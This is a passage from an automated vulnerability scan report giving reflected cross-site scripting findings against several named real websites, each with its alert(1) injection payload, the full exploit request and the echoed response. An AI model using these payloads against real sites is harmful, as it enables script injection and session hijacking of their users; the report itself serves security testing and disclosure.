Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:21 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23707
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/produk-layananb1f29<script>alert(1)</script>636cefd39c0/index.html</b>
...[SNIP]...

4.59. http://beta.telkom.co.id/produk-layanan/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /produk-layanan/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ba9b"><script>alert(1)</script>1ab312460db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /produk-layanan2ba9b"><script>alert(1)</script>1ab312460db/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:17 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23713
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/produk-layanan2ba9b"><script>alert(1)</script>1ab312460db/index.html?&lid=en">
...[SNIP]...

4.60. http://beta.telkom.co.id/produk-layanan/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /produk-layanan/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 15993--><script>alert(1)</script>bc09b8de5cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /produk-layanan15993--><script>alert(1)</script>bc09b8de5cd/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.1.10.1308921355; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:26 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23716
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/produk-layanan15993--><script>alert(1)</script>bc09b8de5cd/index.html?&lid=en">
...[SNIP]...

4.61. http://coverage.mqcdn.com/coverage [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 306e8<script>alert(1)</script>cd3f1595c was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback306e8<script>alert(1)</script>cd3f1595c&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 14:15:23 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/3.2 Python/2.6.2
Pragma: no-cache
Cache-Control: no-cache
ntCoent-Length: 1754
Connection: close
Content-Type: text/javascript; charset=utf-8
Content-Length: 1754

MQA._covCallback306e8<script>alert(1)</script>cd3f1595c({"map": [{"opt": false, "copyrights": [{"html_short": "", "html": "", "text_short": "Intermap", "text": "Intermap", "id": "intermap", "group": "Imagery"}], "id": "map_na"}, {"opt": false, "copyrights"
...[SNIP]...

4.62. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d6c3e<script>alert(1)</script>14f55be02a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat&d6c3e<script>alert(1)</script>14f55be02a5=1 HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 14:15:23 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/3.2 Python/2.6.2
Pragma: no-cache
Cache-Control: no-cache
ntCoent-Length: 1720
Connection: close
Content-Type: text/javascript; charset=utf-8
Content-Length: 1720

MQA._covCallback({"map": [{"opt": false, "copyrights": [{"html_short": "", "html": "", "text_short": "Intermap", "text": "Intermap", "id": "intermap", "group": "Imagery"}], "id": "map_na"}, {"opt": fa
...[SNIP]...
"text_short": "i-cubed", "text": "i-cubed", "id": "i3", "group": "Imagery"}], "id": "i3"}]},"format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat&d6c3e<script>alert(1)</script>14f55be02a5=1")

4.63. http://display.digitalriver.com/ [aid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9f10'-alert(1)-'6801cde2886 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244a9f10'-alert(1)-'6801cde2886&tax=par HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:55 GMT
Server: Apache/2.2.9
Expires: Sat, 25 Jun 2011 02:40:55 GMT
Last-Modified: Sat, 25 Jun 2011 02:10:55 GMT
Content-Length: 226
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244a9f10'-alert(1)-'6801cde2886&tax=par';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

4.64. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd9b8'-alert(1)-'b4bb3b738c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=par&cd9b8'-alert(1)-'b4bb3b738c5=1 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:55 GMT
Server: Apache/2.2.9
Expires: Sat, 25 Jun 2011 02:40:55 GMT
Last-Modified: Sat, 25 Jun 2011 02:10:55 GMT
Content-Length: 229
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=par&cd9b8'-alert(1)-'b4bb3b738c5=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

4.65. http://display.digitalriver.com/ [tax parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6d7b'-alert(1)-'ca81e9e8486 was submitted in the tax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=parf6d7b'-alert(1)-'ca81e9e8486 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:55 GMT
Server: Apache/2.2.9
Expires: Sat, 25 Jun 2011 02:40:55 GMT
Last-Modified: Sat, 25 Jun 2011 02:10:55 GMT
Content-Length: 226
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=parf6d7b'-alert(1)-'ca81e9e8486';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

4.66. http://drh2.img.digitalriver.com/store [CategoryID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://drh2.img.digitalriver.com
Path:   /store

Issue detail

The value of the CategoryID request parameter is copied into the HTML document as plain text between tags. The payload 3fe60<script>alert(1)</script>65e3098e1b1 was submitted in the CategoryID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /store?SiteID=ea&Locale=en_US&Action=DisplayDRProductInfo&CategoryID=88318003fe60<script>alert(1)</script>65e3098e1b1&orderBy=date+descending&size=1000&version=2&eaHideSearchResults=false&output=json&content=displayName+keywords+eaProdImageSmall+eaGenre+platform&jsonp=quicksearch HTTP/1.1
Host: drh2.img.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=UTF-8
Last-Modified: Fri, 24 Jun 2011 13:45:32 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=86400+0;age=9;ecid=21782327991,0)
Content-Length: 72907
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app71
Access-Control-Allow-Origin: *
Cache-Control: max-age=86400
Expires: Sat, 25 Jun 2011 13:45:42 GMT
Date: Fri, 24 Jun 2011 13:45:42 GMT
Connection: close


<!-- REQUEST ID: TIME=1308923132925:NODE=c1a7103:THREAD=692 -->


/* Digital River ProductInfo Widget */
/* JSON Output */


quicksearch({productInfo:{categoryID:"88318003fe60<script>alert(1)</script>65e3098e1b1",startIndex:0,size:1000,totalSize:268,product:[{productID:229170000,displayName:"Need for Speed... The Run Limited Edition",keywords:"NFS, needforspeed, racing, cars, car, therun, race, nfstherun, nfs
...[SNIP]...

4.67. http://ds.addthis.com/red/psi/sites/www.phuket.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.phuket.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload aa9cc<script>alert(1)</script>b2413e078b1 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.phuket.com/p.json?callback=_ate.ad.hpraa9cc<script>alert(1)</script>b2413e078b1&uid=4dce8a530508b02d&url=http%3A%2F%2Fwww.phuket.com%2Fandamanwhitebeach%2F&ref=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&ypa3gm HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh45.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308921530.3M|1308921511.3N|1308911539.1WV|1308911539.1FE|1308911539.60|1308911539.1EY|1308225884.19F|1308225884.1VV|1306359996.1OD; ssh=eJwzMjA0NDAzMrFKS0xOTcrPz9YxtM7IL8lNzMzRMQQAekUI6A%3D%3D; sshs=hotmail%2Cfacebook; bt=1308921511|00004M01000004N010; dt=X; psc=4; uid=4dce8a530508b02d

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Fri, 24 Jun 2011 13:22:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 24 Jun 2011 13:22:34 GMT
Connection: close

_ate.ad.hpraa9cc<script>alert(1)</script>b2413e078b1({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

4.68. http://km5002.keymetric.net/KM2.js [hist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the hist request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5708b'%3balert(1)//4f9b3d66658 was submitted in the hist parameter. This input was echoed as 5708b';alert(1)//4f9b3d66658 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=5708b'%3balert(1)//4f9b3d66658&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:15 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5099

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
TString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmCookieDays = 365;
kmExt = new Date();
kmExt.setTime(kmExt.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cookie = 'kmE5002=1:0|15149,5708b';alert(1)//4f9b3d66658;expires=' + kmExt.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmLat = new Date();
kmLat.setTime(kmLat.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cookie = 'kmL5002=1|1|Camp
...[SNIP]...

4.69. http://km5002.keymetric.net/KM2.js [lag parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lag request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8458'%3balert(1)//a36ce79db04 was submitted in the lag parameter. This input was echoed as a8458';alert(1)//a36ce79db04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=a8458'%3balert(1)//a36ce79db04&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:00 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5095

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
':
val = '0'; break;
case 'cpca':
val = 'Campaign not provided'; break;
case 'kmca':
val = 'Campaign not provided'; break;
case 'cpag':
val = 'a8458';alert(1)//a36ce79db04'; break;
case 'kmag':
val = 'a8458';alert(1)//a36ce79db04'; break;
case 'kw':
val = 'Keyword not provided'; break;
case 'kmkw':
val = 'Keyword not provi
...[SNIP]...

4.70. http://km5002.keymetric.net/KM2.js [las parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the las request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f274'%3balert(1)//058ce2b81c7 was submitted in the las parameter. This input was echoed as 1f274';alert(1)//058ce2b81c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=11f274'%3balert(1)//058ce2b81c7&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:45 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5099

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
5149,;expires=' + kmExt.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmLat = new Date();
kmLat.setTime(kmLat.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cookie = 'kmL5002=1|11f274';alert(1)//058ce2b81c7|Campaign not provided|AdGroup not provided|Keyword not provided|unk|Referrer information not available|Raw Query not available;expires=' + kmLat.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
...[SNIP]...

4.71. http://km5002.keymetric.net/KM2.js [lc1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km5002.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lc1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95c71'%3balert(1)//e91e1825f03 was submitted in the lc1 parameter. This input was echoed as 95c71';alert(1)//e91e1825f03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.37881999695673585&las=1&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=95c71'%3balert(1)//e91e1825f03&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.onlinecomcast.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=32&btz=360&bge=1 HTTP/1.1
Host: km5002.keymetric.net
Proxy-Connection: keep-alive
Referer: http://www.onlinecomcast.com/?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:32:02 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5121

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
val = 'unk'; break;
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmrq':
val = 'Raw Query not available'; break;
case 'kmc1':
val = '95c71';alert(1)//e91e1825f03'; break;
case 'kmc1':
val = '95c71';alert(1)//e91e1825f03'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc2':
val = 'N/A'; break;
case 'kmc3':
...[SNIP]...

